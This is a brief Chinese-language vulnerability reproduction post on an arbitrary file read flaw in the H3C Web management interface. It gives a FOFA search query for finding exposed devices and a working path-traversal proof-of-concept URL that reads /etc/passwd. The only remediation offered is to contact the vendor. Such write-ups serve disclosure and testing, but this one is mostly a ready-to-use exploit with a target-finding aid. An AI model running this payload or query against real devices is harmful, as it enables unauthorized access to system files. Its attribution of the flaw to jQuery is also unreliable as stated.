【漏洞复现】H3C Web网管登录任意文件读取漏洞

Nx01 产品简介

        H3C设备的Web网管是指H3C公司生产的网络设备的网络管理界面。它可以通过Web浏览器进行访问和操作，以实现对网络设备的配置、管理和监控。

Nx02 漏洞描述

        jquery旧版本存在任意文件读取漏洞，允许攻击者在受害者的服务器上读取任意文件。H3CWeb网管部分使用过时的jquery版本导致存在任意文件读取漏洞。

Nx03 产品主页

fofa-query: body=”/webui/js/jquerylib/jquery-1.7.2.min.js”

Nx04 漏洞复现

POC：

/webui/?g=sys_dia_data_down&file_name=../../../../../../../../../../../../etc/passwd

Nx05 修复建议

建议联系软件厂商进行处理。